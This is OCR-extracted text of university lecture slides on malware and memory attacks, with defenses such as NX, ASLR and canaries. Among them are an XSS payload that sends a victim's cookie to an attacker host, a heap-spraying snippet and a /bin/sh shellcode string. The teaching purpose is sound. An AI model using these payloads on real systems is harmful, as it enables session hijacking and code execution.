Malware’dmnicol.web.engr.illinois.edu/ece422/sp2010/slides/malware.pptx.pdf ·...

Malware

Reading Material

•  Ken Thompson and Trojans – h6p://www.ece.cmu.edu/~ganger/712.fall02/papers/p761-‐thompson.pdf

•  Worm Anatomy and Model h6p://portal.acm.org/citaGon.cfm?id=948196

•  Smashing the Stack for Fun and Profit h6p://insecure.org/sR/smashstack.html

Why Do We Care?

•  SANS Top 20 Internet Security VulnerabiliGes – h6p://www.sans.org/top20/

•  Broad issues very similar year in and year out

Zero Day Exploit

•  An exploit that has no patch available

•  Time between exploit discovery and wide acGvaGon shrinking

•  Malware developer has trade-‐off in launch tacGcs – Big splash but faster discovery – Reduced a6ack rate but longer undiscovered

Windows Meta File Exploit

•  Exploit flaws in the Windows rendering engine enable remote code execuGon –  Memory corrupGons –  VisiGng web site with “bad image” causes a6ack –  A6ack sold for $4,000 –  h6p://www.eweek.com/arGcle2/0,1895,1918198,00.asp

•  Bugtraq post in December 2005 –  Probably lingering earlier –  0 day exploit

•  Microsof’s response in early January 2006 –  h6p://www.microsof.com/technet/security/bulleGn/ms06-‐001.mspx

Malicious Code

•  Set of instrucGons that cause a site’s security policy to be violated

•  Ofen leveraging an inadvertent flaw (design or implementaGon) – To propagate/install on target – To cause harm on target

Malware Summary

Code type CharacteristicsVirus Attaches itself to program and copies to other programsTrojan Horse Contains unexpected, additional funtionalityLogic Bomb Triggers action when condition occursTime Bomb Triggers action when specified time occursTrapdoor Allows unauthorized access to functionalityWorm Propagates copies of itself through a networkRabbit Replicates itself without limit to exhaust resourcesNetbot Trapdoor programs orchestrated through control channel (IRC)Root Kit Hooks standard OS calls to hide data

Trojan Horses

•  Seemingly useful program that contains code that does harmful things – Perform both overt and covert acGons

•  Frequently embedded in applets or games, email a6achments

•  Trojan horse logins, spoof authenGcaGon or webpage forms

Thompson's Trojan Compiler

•  Detect it is compiling “login” program – Add “bug” to accept fixed password

•  Problem: – Easily seen in code review

•  SoluGon: – Add second bug acGvated when compiling compiler itself

– Then remove bugs from source

Key Loggers and Spyware

•  Gather informaGon from computer – Send back to the central office

•  From key loggers can gather – Passwords – ConfidenGal communicaGon – Keep track of your kids/employees

•  From spyware can gather – Web browsing habits – Gather markeGng informaGon

Rootkits

•  Insert file filters to cause files or directories disappear from normal lisGngs – Can replace Windows API pointers (user mode) – Can also replace syscall table pointers

•  Both require privilege, but most Windows installs require privilege anyway – The power of extensibility used for the dark side

•  Techniques apply equally well to Linux and Mac

Sony Player DRM and Rootkits

•  Bad press for Sony 2005 – Mark Russinovich's original observaGons h6p://blogs.technet.com/markrussinovich/archive/2005/10/31/sony-‐rootkits-‐and-‐digital-‐rights-‐management-‐gone-‐too-‐far.aspx#comments

–  A Gmeline •  h6p://www.boingboing.net/2005/11/14/sony_anGcustomer_te.html

•  To ensure that copy protecGon is not evaded install rootkit to hide the protecGon code –  Available for other a6ackers to use –  Uninstallable –  Uses CPU and memory –  Not adequately noted in EULA

Virus OperaGon

•  Virus Phases: – Dormant: WaiGng on trigger event – PropagaGon: ReplicaGng to programs/disks – Triggering: By event to execute payload – ExecuGon: ExecuGng payload

•  Details usually Machine/OS specific – Exploits different features or weaknesses

Virus Pseudocode

•  beginvirus: •  If spread-‐condiGon then begin –  For some set of target files do begin

•  If target is not infected then begin –  Determine where to place virus instrucGons

–  Copy instrucGons from beginvirus to endvirus into target

–  Alter target to execute new instrucGons

•  Perform some acGons •  Goto beginning of infected program

•  endvirus:

Virus A(achment

•  A Virus can a6ach itself to a program or to data by –  Appending itself to either the beginning or end of either source code

or assembly, so it is acGvated when the program is run –  Integrate itself into the program, spread out code –  Integrate into data: executable text macro, scripGng –  Macros and email a6achments

•  An acGvated virus may: –  Cause direct or immediate harm –  Run as a memory resident program (TSR, daemon, or service) –  Replace or relocate boot sector programs, start at system start-‐up

Macro Viruses

•  Macro code a6ached to some data file –  Interpreted rather than compiled –  PlaRorm independent

•  Interpreted by program using the file –  E.g., Word/Excel macros –  Esp. using auto command and command macros –  Ofen automaGcally invoked

•  Blurs disGncGon between data and program files making task of detecGon much harder

•  Classic trade-‐off: “ease of use” vs “security”

Email Viruses

•  Spread using email with a6achment containing a macro virus – Melissa, LoveBug

•  Triggered when user opens or executes a6achment – Also when mail viewed by using scripGng features in mail agent

– Usually targeted at Microsof Outlook mail agent and Word/Excel documents, Microsof IIS

Basic PrecauGons

•  Don’t import untrusted programs

– Who can you trust? – Viruses have been found in commercial shrink-‐wrap sofware

– Standard download sites have been corrupted •  Check MD5 hashes

•  Scan for viruses, install anG-‐virus sofware •  Update anG-‐virus sofware regularly

Signature Scanning

•  Early viruses had characterisGc code pa6erns known as signatures

•  Create a database of pa6erns, search files for pa6erns (McAffee)

•  Use data-‐mining, learning, feature extracGon etc. to look for disguised or obfuscated pa6erns

•  Can only scan for known signatures

Signature Avoiding Viruses

•  Polymorphic Virus produces varying but operaGonal copies of itself – Use alternaGve but equivalent instrucGons – Gets around signature scanners. Whale virus, 32 variants

•  Stealth Virus acGvely tries to hide all signs of its presence – A virus can intercept calls to read a file and return correct values about file sizes etc.

Another Signature Avoiding Virus

•  Encrypted Virus stores bulk of self encrypted – Small decrypt rouGne in clear – Key stored in clear

Worms

•  Propagate from one computer to another

•  Viruses use email/infected media to propagate to so differenGaGon is fuzzy

The Morris Worm Incident

•  How 99 lines of code brought down the Internet (ARPANET actually) in November 1988.

•  Robert Morris Jr. Ph.D student, Cornell, wrote a program that could: –  Connect to another computer, and find and use one of several vulnerabiliGes

(buffer overflow in fingerd, password cracking etc.) to copy itself to that second computer.

–  Begin to run the copy of itself at the new locaGon. –  Both the original code and the copy would then repeat these acGons in an

infinite loop to other computers on the ARPANET (mistake!) •  Morris was sentenced to three years of probaGon, 400 hours of

community service, and a fine of $10,050. He is now a Professor at MIT. •  Worms have go6en bigger and more aggressive

Worm Phases

•  Dormant

•  PropagaGon – Search for other systems to infect – Establish connecGon to target remote system

– Replicate self onto remote system •  Triggering •  ExecuGon

Who to target?

•  Scanning – Currently generally used – Select random addresses •  Mix of addresses in current network (local computers probably have similar vulnerabiliGes) and remote networks

– No longer feasible in IPv6 •  32 bit vs 128 bit address space

Viruses and Worms in IPv4

•  Slammer infected most of the IPv4 Internet in 10 minutes (75,000 hosts infected in one-‐half hour)

Source caida.org

Worms in IPv6

•  Address space is 2^128 instead of 2^32 – Random address selecGon will not work

•  Say ¼ of address in IP4 network run Windows – 1 in 4 chance of finding a target with each probe

•  Spread that among 2^128 addresses – 1 in 2^98 chances of finding a viable target

Other Techniques to Find Targets

•  InteresGng Papers –  How to 0wn the Internet…

h6p://www.icir.org/vern/papers/cdc-‐usenix-‐sec02/ –  Top speed of flash worms

h6p://vividmachines.com/papers/topspeed.pdf

•  Hitlist Scanning –  Stealthy scans (randomized, over months), distributed scanning,

•  DNS searches, Spiders (Code red, crawls for high connecGvity), listening on P2P networks, public lists

•  PermutaGon scanning (divide up IP address space) •  Warhol worm-‐ Hit list + permutaGon

Network PropagaGon

•  Send small number of packets to reduce detecGon

•  UDP packets –  No ACK needed, so can spoof source address

•  Connect to vulnerable network services –  Generally exercise buffer overflow –  Launch shell

•  Running at high privilege (ideal) •  Or use as foothold to mount other a6acks to gain privilege

•  Or use as a6ack launch point

Worm Examples

•  Morris Worm •  Code Red –  Exploited bug in MS IIS to penetrate and spread –  Probes random IPs for systems running IIS –  Had trigger Gme for denial-‐of-‐service a6ack –  2nd wave infected 360000 servers in 14 hours

•  Code Red 2 -‐ trapdoor, for remote control •  Nimda -‐ used mulGple infecGon mechanisms, email, file-‐sharing, web-‐client, IIS, Code Red 2 backdoor

A6acks through browsers

32

HTML is stateless

•  Each interacGon of a client with server has no memory, at least as far as the protocol is concerned

•  Session state is created by server, wriGng a “cookie” into a document as part of the header, saved by the client’s browser

•  May contain anything the server wishes to record, e.g. –  Password, account number, idenGty, shopping cart

– Most typically a session ID

•  Cookie is returned by the browser with every access to the server

33

How cookies work From the client to the

server, something like

With a response (to set a cookie) like

Browser understands to include cookie with every subsequent GET, e.g.

34

Cookie tells server the second request is related to the first

Other cookie a6ributes include domain, path, expiraGon date

Abuse of Cookies

•  “Cookie hijacking” – Unencrypted cookie value sniffed off network, HTTP session is “hijacked” by outsider who has credenGals the cookie represents

•  “Cookie Thef”, more subtle, done remotely – Track behaviors – Reveal idenGty – Steal and abuse idenGty

•  Access to cookies achieved using Javascript

35

Javascript

•  Programming language designed to make web pages “dynamic”, e.g., – Format checking of web form entries

– Pop open a new window – Changing images as cursor passes over specific regions of the page

•  Executed within a browser (“client-‐side”) – Can be embedded in page obtained from server –  Interacts with elements of the page (“Document Object Model”, or DOM) •  Includes data, javascript can get the value of a cookie

36

Document Object Model

•  A script bound to a page has a “DOM” model of that page

•  Can pass informaGon back to the server, or a different web-‐site altogether

•  So we have a powerful programming language in a web page that can get to sensiGve informaGon and send it elsewhere –  Think maybe there’s potenGal for a problem here?

37

ProtecGon 101 A browser concurrently manages mulGple pages from mulGple

origins

–  Each has its own document elements, including cookies The “Same Origin Policy” prevents a document or script from

one site of origin from manipulaGng or communicaGng with one from a different origin –  But allows coordinaGon for pages “within” same origin, e.g., scripts can “see” other pages, including their cookies

“Origin” here refers to (domain name, port, protocol) of site, see below

38

The security assumpGon

Under the Same Origin Policy, the client browser trusts any script it receives from the server to access any cookie bound to any page in the same domain because it trusts the server

Should it?

Frequently a server will just reflect back input from a client

39

Example of ReflecGng Input

40

Query

Response

The client might send a script!

A cross site scrip4ng (XSS) vulnerability exists at a server if it reflects back a script that is then executed at the client

But what’s the problem? A client a6acks herself?

Watch this….

41

XSS A6ack •  Suppose

–  www.bob.com has an XSS vulnerability –  Alice visits www.bob.com a lot

•  She logs in, www.bob.com returns a session ID cookie

–  Eve knows about the vulnerability and sends Alice an email with an evil link (containing an a6ack script) •  Or embedded in a CSS header with HTML forma6ed

email. Alice only has to OPEN the message!

42

www.bob.com

login

cookie:session ID

www.bob.com

h6p://host/a.php?variable="><script>document.locaGon='h6p://www.witch.com/cgi-‐bin/get.cgi? '%20+document.cookie</script>

XSS A6ack : Cookie Thef

•  Directed at server •  Embedded Script •  Transmission to www.witch.com •  Alice’s cookie

43

www.bob.com

cookie:session ID

h6p://www.bob.com/a.php? variable="><script>document.locaGon='h6p://www.witch.com/cgi-‐bin/get.cgi? '%20+document.cookie</script>

XSS A6ack : Cookie Thef

•  Click evil URL

44

www.bob.com

cookie:session ID

…<script>… Reflected back

•  Script takes permissions of Alice’s page on www.bob.com

www.bob.com

cookie:session ID

•  Script executes

www.witch.com

cookie:session ID

cookie:session ID

•  With Alice’s session ID, Eve can impersonate Alice, obtain sensiGve informaGon from her account on www.bob.com

Other XSS a6acks

BulleGn Board PosGngs

–  some permit user inclusion of HTML Mashups

– Web sites that integrate interacGng components from mulGple sources, e.g., hotel lisGng with maps.google.com at the side or adverGsements in Facebook

Mashups work around Same Origin Policy

If a Mashup framework is vulnerable to XSS, then a malicious component can inject code

–  e.g. a paid-‐for web adverGsement

45

Mashups

If a Mashup framework is vulnerable to XSS, then a malicious component can inject code (e.g. adverGsement)

46

A6acks through memory

47

Outline

Typical a6ack through memory is comprised of several parts – Find an applicaGon with a memory vulnerability •  Browsers, internet service apps, Adobe Reader…

– Find a way of a controled overwrite of a criGcal piece of memory •  Usually to get the computer to execute a6acker’s code

– Find a way of ge�ng a6acker’s code in memory – Trigger vulnerability with carefully crafed a6ack input

48

Let’s start at the very beginning

“Von Neumann” computers store programs in memory, along with data

Modern computers use dedicated registers to “point” at key locaGons

49

Program Counter (PC) Stack Pointer (SP)

An “instrucGon” is read out from The memory locaGon given by the PC, and interpreted by the control Unit

•  the PC is increased to point to the next instrucGon •  the “stack” is dynamically changing scratch space

Memory OrganizaGon

Virtual memory -‐-‐-‐ hardware translaGon of logical address space to physical : every process “sees” the whole memory for itself

50

Memory parGGoned in to different segments with different roles •  Kernel •  Text (instrucGons) •  IniGalized data •  UniniGalized data •  Dynamically allocated •  Stack •  heap

Jumping around

The PC advances linearly, except when it is explicitly loaded –  To branch on a condiGonal instrucGon –  To “jump” to a subrouGne –  To “return” from a subrouGne –  To handle an excepGon –  To select the implementaGon of a “virtual funcGon”

In all but the first of these cases, the value loaded into the PC is found explicitly in memory. – A memory a6ack consists of changing that value to point to some code the a6acker managed to get into the memory

51

Primer on subrouGnes

A subrouGne is a modular block of code

– The program “calls” via a special CPU instrucGon •  PC is loaded with the subrouGne address

– The subrouGne “returns” to the instrucGon afer the calling point, via a special CPU instrucGon •  The address loaded into the CPU is on the “stack”

52

Stack Dynamics •  Each subrouGne call pushes a frame onto the stack –  It is popped on return –  SP moves with each stack operaGon

–  Look at posiGon of “Local Variables” – Memory writes go from low address to high address – Hold that thought….

53

Buffer Overflow

When a buffer is created memory, its maximum length is declared

Common operaGon : copy a string of characters, from one place in memory to another

–  By convenGon, a null byte (all 0’s) signals the end Sloppy coding pracGce : copy one byte at a Gme, unGl null is

reached

a b c null x y z empty empty

buffer In use

from to

Buffer Overflow




reached

a b c null x y z empty

buffer In use

from to

Buffer Overflow




reached

a b c null x y z empty

buffer In use

from to

from points to null? No

Buffer Overflow




reached

a b c null x y z

buffer In use

from to

b a

Buffer Overflow




reached

a b c null x y z

buffer In use

from to

b a

from points to null? No

Buffer Overflow




reached

a b c null y z

buffer In use

from to

b a

!

c

Buffer Overflow

•  Most common pen-‐test security vulnerability 2003 (SANS/FBI) •  One of the most serious classes of security threats

–  An a6acker can gain parGal or complete control of a host

•  Buffer (array or string): space in which data can be held •  A buffer’s capacity is finite:

–  char sample[10]; –  sample[10] = ’A’;

•  Buffer sizes do not have to be predefined. Out-‐of-‐bounds error

60

Effects of Buffer Overflow

•  A program that fails to check a buffer overflow may allow vital code or data to be overwri6en

•  A buffer may overflow into and change: –  User’s own data structures –  User’s program code –  System data structures

–  System program code

•  Most common a6ack is to subvert the funcGon of a privileged program and take control of the host

61

Old School : Stack Smashing

•  A6acker overflows stack allocated variable to corrupt the return address

•  Also called Stack Smashing A6ack. –  Formerly most common buffer-‐overflow a6ack, now largely miGgated

•  Rewrite return address or frame pointer with a6ack code, or rewrite pointer to address to “a6ack” code in user memory

•  On return execuGng code in stack buffer at original program privilege –  Typically a6ackers exec a shell

62

Stack smashing

SomeGmes a subrouGne will create a buffer in “local variables”, copy a string into it, but not check length

63

Buffer

Stack smashing


64

A6acker data

Stack smashing


65

A6acker data

Stack smashing


66

A6acker data

Address of “shellcode”

Returning from subrouGne call loads PC with address of “shellcode” about which more, anon

Stack smashing


67

A6acker data

Address of “shellcode”

A6ack code just part of the string being copied

shellcode

Defense against stack smashing

The a6acker needs to know the memory address of his shellcode – The a6acker’s string gets loaded on to the stack, a6acker can use a debugger to figure out addresses

Defenses include

•  se�ng “no execute” protecGon on stack •  RandomizaGon of memory layout with each program execuGon

•  StaGc and dynamic buffer bounds checking

68

The Empire Strikes Back

A6acker a6enGon moved to a6acks through memory addresses not on the stack

Stack allocaGons are temporarily, they disappear afer a subrouGne returns

The “heap” allows a program to dynamically request a block of memory, and have it stay allocated across mulGple subrouGne calls

The data segments store variables and strings that might also be subverted by an overflow

69

Example : changing a file name

•  Imagine a buffer that resides just below a string that idenGfies a file

•  Further imagine a program that has a buffer overflow vulnerability on “buffer”, opens the named file, and writes user supplied informaGon there

•  A6ack consists of –  OverwriGng buffer, replacing file name with a6acker’s choice, e.g., /etc/.rhosts

–  Choosing string to write into file, e.g., an rhosts file that includes a6acker’s machine

•  Observe that no subversion of control flow occurs

70

null

buffer

/ t m p / s c r a t c h

A6acks through the heap : preliminaries

Remember doubly linked lists

71

0xbcd3000

0xbcd3080

null

100

“next”

“prev”

size

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

0xbcd3080

Programs dynamically add and delete items

A6acks through the heap : preliminaries

To remove center block from list, change pointers

72

0xbcd3000

0xbcd3080

null

100 size

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

0xbcd3080 “next”

“prev”

A6acks through the heap : preliminaries To remove center block from list, change pointers

73

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

Variable “hdr”

0xbcd3000

hdr-‐>next-‐>next-‐>prev = hdr-‐>next-‐>prev

“next”

“prev” 0xbcd3080


74

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

Variable “hdr”

0xbcd3000


“next”



75

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

Variable “hdr”

0xbcd3000


“next”



76

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

Variable “hdr”

0xbcd3000


“next”



77

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

Variable “hdr”

0xbcd3000

“next”

“prev”



78

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

Variable “hdr”

0xbcd3000

“next”

“prev”


OBSERVE : header has target address, AND value to load


79

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

0xbcd4000

0xbcd3000 80

null

Variable “hdr”

0xbcd3000


“next”

“prev”

hdr-‐>next = hdr-‐>next-‐>next

A6acks through the heap : the real deal Suppose an a6acker can corrupt the middle header

80

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

80

null

Variable “hdr”

0xbcd3000

“next”


Jump adrs

Shellcode adrs

FuncGon ptr

User Data Object

A6acks through the heap : the real deal Suppose an a6acker can corrupt the middle header

81

0xbcd3080

null

100

0xbcd3080

32

0xbcd4000

80

null

Variable “hdr”

0xbcd3000

“next”


Jump adrs

Shellcode adrs

Sub return FuncGon ptr

The unlinking overwrites return adrs On call to funcGon, control passed to

shellcode

User Data Object

How can headers become corrupted? •  A6ack has to know how heap is managed

•  A6ack code uses allocaGons/deallocaGons to get –  A pointer to an object that points to the target –  A pointer to an object immediately “below” the target in memory

that can be over-‐flowed

82

32

next

prev

hdr




83

32

next

prev

hdr




84

32

next

prev

hdr




85

32

next

prev

hdr

Jump adrs




86

32

next

prev

hdr

Jump adrs

Shellcode adrs

Heap-‐based a6acks

•  InGmate knowledge of how heap is managed required

•  ApplicaGon code with suitable overflow vulnerability required

•  Ability to allocate / deallocate heap blocks to posiGon for a6ack required

•  Ability to load shellcode required •  Ability to aim jump at shellcode required

Seems very tricky, but…

87


•  InGmate knowledge of how heap is managed required – A6acker can observe using debugger; this informaGon is shared in the cyber underground

88


•  InGmate knowledge of how heap is managed required •  ApplicaGon code with suitable overflow vulnerability

required –  “Fuzzing” an applicaGon with lots of random junk leads to a crash, post-‐mortum analysis finds where heap pointers corrupted due to overflow… a6ack found his toehold

–  Fuzzing with not-‐so-‐random junk, e.g. looking for integer/floaGng point overflows •  Mismatch between allocated space (too small) and data being loaded there

89




•  Ability to allocate / deallocate heap blocks to posiGon for a6ack required – Web browsers running javascript or flash take scripts offered on webpages and run them.

– pdf documents carry scripts in their headers, readers run them immediately

90


•  InGmate knowledge of how heap is managed required •  ApplicaGon code with suitable overflow vulnerability

required •  Ability to allocate / deallocate heap blocks to posiGon for

a6ack required •  Ability to load shellcode required –  Shellcode encoded in strings wri6en into dynamically allocated memory •  May be passed as part of a6ack input through web connecGon

•  May be embedded in image, document, or string in a6acker’s script

91




•  Ability to allocate / deallocate heap blocks to posiGon for a6ack required

•  Ability to load shellcode required •  Ability to aim jump at shellcode required

– Difficult to get exactly, but there are ways…

92

State of the art in browser exploitaGon

Stack overflows : classic, but defenses have been raised

93

(Structured ExcepGon Handling)

(detect overruns before using jump address)

(a6acker has to guess at stack layout)

“Heap Feng Shui in Javascript”, Alexander SoGrov

Heap overflows

We’ve seen proof of concept, in pracGce it is hard and defenses have been raised

94

(trick shown earlier….BUSTED)


What’s lef to a6ack?

•  Non-‐array stack overflows – Very rare

•  Use of uniniGalized variables – Stack variables – Use afer “free”

•  ApplicaGon data on the heap – ApplicaGon specific memory headers – FuncGon pointers – C++ object pointers

95 “Heap Feng Shui in Javascript”, Alexander SoGrov

DefiniGve a6ack “setSlice”

•  Uses heap spraying to fill browser heap with shellcode

•  Overwrites applicaGon object pointer in the previous heap chunk – Here an applicaGon vulnerability is required – Hope that afer a6ack overwrites object pointer, the applicaGon actually uses that pointer!

– May just end up crashing the browser


Heap Spraying

Developed by Blazde and SkyLined, used by most browser exploits since 2004

var x = new Array(); // fill 200MB of memory with copies of NOP // slide and shellcode

for(var i = 0; i < 200; i++) { x[i] = nop + shellcode; }


Normal heap layout


Afer heap spraying


FuncGon pointer overwrite

1.  Spray the heap with 200MB of shellcode (and slide) 2.  Overwrite a funcGon pointer with 0x0c0c0c0c (e.g.

some pointer to an excepGon handler in staGc data) 3.  Arrange for the pointer to be called


Object pointer overwrite

•  Spray the heap with 200MB of shellcode, using byte 0x0c as a NOP

•  Overwrite an object pointer with 0x0c0c0c0c •  Call a virtual funcGon of the object

101

Pointer to table of virtual funcGon pointers is some offset from base, but is 0x0c0c0c0c

ParGcular funcGon called determines offset into vtable…but whatever it indexes to, the value there is 0x0c0c0c0c

presumed object at 0xc0c0c0c0

presumed vtable at 0xc0c0c0c0

presumed funcGon at 0xc0c0c0c0


Clever but unreliable

•  Heap spraying very effecGve, but setSlice exploit is not reliable

•  OverwriGng applicaGon data requires a specific layout of heap chunks, not controlled in setSlice

•  Need to prepare the heap state prior to the exploit


Heap Feng Shui

•  The heap allocator is determinisGc

•  Specific sequences of allocaGons and frees can be used to control the layout


Heap Feng Shui




Heap Feng Shui




Heap Feng Shui




Heap Feng Shui



•  Exploit requires very careful series of heap ops from Javascript….but it works….


You promised us shellcode…

•  Small piece of code used as payload in an exploit of a computer vulnerability – Needs to be in binary

•  Requires a6enGon to a lot of details •  Can’t have null bytes (usually passed as a string, null terminates a string)

– Gives some kind of service to the a6acker •  An interacGve command “shell” •  TCP/IP connecGon back to a6acker •  Downloads and executes malware

–  “drive-‐by downloads”

108

More on Shell Code

•  Insert code to spawn a shell •  Phrack arGcle discusses how to do this from first principles –  Create assembly code to exec /bin/sh –  Use GDB to get hex of binary code –  Rework assembly as necessary to avoid internal 0’s

•  Could break a6ack if strcpy is used by a6ack target •  Will result in a hex string like: –  “\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh”

109

More on shellcodes

•  Local – hacker si�ng at the machine, networking not needed

•  Remote –  Connect-‐back : shellcode able to open TCP/IP connecGon back to a6acker

–  Bindshell : shell code has to “bind” to a port and “listen” for a connecGon from the a6acker

–  Socket-‐reuse : shellcode able to use an already opened network connecGon •  Hard to exploit, hard to detect

–  Big win if exploited code is “setuid” •  Means that malware can run with root priviledges

110

Drive-‐by downloads

•  In 2007 Google surveyed billions of sites, subjecGng 4.5M to scruGny –  450,000 able to launch drive-‐by downloads (only through vulnerable browsers)

– Another 700,000 capable of other compromises •  Many use social engineering, “click here for ….” •  A6ack code ofen hidden in parts of page not controlled

by site –  Banner adverGsements, widgets (e.g. traffic counter)…these loaded from 3rd party site

–  PosGng / comments in blogs (see cross-‐site scripGng)

111

Botnets

A compromised host (“zombie”) follows commands obtained from a C&C (command and control) computer

•  Zombie will scan enivronment for resources-‐-‐-‐what can it be used for-‐-‐-‐and report to bot master

•  Will ofen use an IRC channel, IM, or twi6er for communicaGon (to hide)

– But these become known – ReacGon has been designs that are more resilient to idenGficaGon, shutdown, C&C discovery

112

Botnet economy

•  Large botnets have grown (e.g., Conficker) •  Use is sold in an underground economy, e.g., to serve out

spam

113

Conficker See h6p://mtc.sri.com/Conficker

Timeline •  Sept 08 : previously unknown vulnerability used in exploits (dubbed

MS08-‐67) -‐-‐-‐ malformed Remote Procedure Call in Windows requests cause buffer overflow –  Affects all modern versions of Windows

•  Sept 08 : Chinese hackers sell exploit for $37.80

•  Oct 23 08 : Microsof issues “emergency patch”

•  Nov. 22 08: Worm outbreak of Conficker reported in PC World

•  Last esGmate over 12 million infecGons –  Why? Patch ignored. Many bootleg copies of Windows

Conficker : How it works Exploit: •  VicGm : Buffer overflow loads shellcode

–  contacts infector which is running HTTP service, downloads worm

–  Worm is in dynamically linked library (DLL) form, runs as a service via svchost.exe

–  encrypted

–  Brought up with every reboot

•  Worm scans (see the CAIDA report ) –  Local network scans (determine broadcast domain from network interface)

–  Nearby other infected hosts -‐-‐ keeps a list of hosts it has infected, and scans the 256 hosts in the same /24 network

–  Random

•  Other infecGon vectors –  Executes through ADMIN$ share on computers visible to NetBIOS

•  DicGonary a6ack if password protected

–  Places copies of self on removeable drives (e.g. USB drives), loads new vicGm when inserted through AUTORUN

Conficker : ConnecGvity Infected hosts can connect with a “master” to down-‐load new versions

–  Variants A & B : •  Every day generate a list of 250 randomly generated IP address

•  Eight Gmes a day a6empt connecGons to a service on every one of those IP addresses

–  The randomness is camoflage

–  Defense a6empted : idenGfy the IP addresses in these lists that are not already

“registered”, register them (to take control), plant honeypot

•  Updates on 3/6/09 and 3/17/09 loaded new version that organized infected hosts

into a botnet

•  On April 1, 2009 the worm will changed behavior, checking into 500 rendezvous

points selected from pool of 50,000

–  AnGcipated that “something” will happen,

–  But nothing new really did

Hardware supported simple fix

The problem is that a6ack code is wri6en into the stack or heap, and can be executed from there

The idea of tagging memory with r/w/x permissions has been around a very long Gme

NX (No eXecute) bit architecture tags pages –  called XD (eXecute Disabled) by Intel, XN (eXecute Never) in ARM processor

Naturally there are a6acks….to turn this feature off!

117

Buffer Overflow Defenses

•  Write correct code

•  Use appropriate languages •  Use tools to analyze problems •  Address Space RandomizaGon

•  Make buffers non-‐executable – Should never need to execute code on the stack or on the heap

118

WriGng Correct Code

•  Simple soluGon, but expensive!

– Performance vs. correctness – Sofware industry pracGces

•  AutomaGc source-‐code analysis (limited scope)

– Super greps like RATS and FlawFinder – Embedded compiler analysis

•  Audit teams, code review

119

Programming Languages

•  Languages that are type-‐safe and enforce bound checks – E.g., Java, ML, Smalltalk

– Perl and Taint-‐mode •  SubsecGons of language and/or code standards – C++ using only smart pointers, std::strings, and STL containers

– Managed Code and the Common RunGme Library (CRL)

120

Tools for Buffer Overflow ProtecGon

•  LibSafe –  h6p://www.research.avayalabs.com/project/libsafe/ –  Intercept calls to funcGons with known problems and perform extra checks

–  Source is not necessary •  StackGuard and SSP/ProPolice –  Place “canary” values at key places on stack –  Terminator (fixed) or random values

–  ProPolice patch to gcc

121

Address Space RandomizaGon

•  Vary the base stack address with each execuGon –  Stack smashing must have absolute address to over write funcGon return address

–  Enabled by default in some linuxes (e.g., FC3)

•  Wastes some address space –  Less of an issue once we have 64 bit address space

•  Not absolute –  Try many Gmes and get lucky

Misc.

123

Fuzzing

•  A variant of the fault injecGon model – Create “fuzzed” input to cause errors

•  ShareFuzz –  Intercept all getenv() calls to return very, very long strings

More Fuzz -‐ SPIKE

•  An input language for creaGng variant network packets

•  From WireShark output, make it easy to express new packets –  a_binary(“00 01 02 03”) Data: <00 01 02 03>

–  a_block_size_big-‐endian_word(“Blockname”); Data: <00 01 02 03 00 00 00 00>

–  a_block_start(“Blockname”) a_binary(“05 06 07 08”) Data: <00 01 02 03 00 00 00 00 05 06 07 08>

–  a_block_end(“Blockname”); Data: <00 01 02 03 00 00 00 04 05 06 07 08>

Exploit Frameworks

•  Metasploit – h6p://www.metasploit.com/index.html

•  Canvas – h6p://www.immunitysec.com

•  Core Impact – h6p://www.coresecurity.com/products/coreimpact/index.php

Defense Through A6ack

•  Ethical hacking – You too can become a cerGfied ethical hacker •  h6p://www.wired.com/news/infostructure/0,1377,64008,00.html •  h6p://www.vigilar.com/training/ceh/index.html?gclid=CKSSs-‐_EvIgCFSAeWAodGm7MaQ

•  Hip term for – PenetraGon TesGng – Vulnerability analysis – Vulnerability researching

PenetraGon TesGng •  Bring in outside team to “a6ack” system – Well-‐defined rules of engagement, e.g., •  no DOS but social engineering is allowed •  Specified target of a6ack •  Cause no permanent damage •  Amount of inside knowledge

•  Benefits – Ability to think outside the box may reveal new issues

•  Concerns – All discovered flaws reported? – Probably not systemaGc

Vulnerability Research

•  Find exploits in deployed sofware – Zero Day exploit – Exploit that is released before fix is available

•  Ethical issues once exploit is found – How soon to reveal exploit afer giving vendor heads up?

– Can you protect your customers in the mean Gme?

Sofware Fault InjecGon

•  Hardware fault injecGon well used and understood – Sofware fault injecGon sGll emerging – AcGve research area at CSL

•  IdenGfy input areas – Generally network, but could also be files, environment variables, command line

•  Inject bad inputs and see what happens

Fault InjecGon Model

Server Client

Fault Injector

Auditor

Date post:	24-Jul-2020
Category:	Documents
Upload:	others
View:	0 times
Download:	0 times

Malware’dmnicol.web.engr.illinois.edu/ece422/sp2010/slides/malware.pptx.pdf ·...

Documents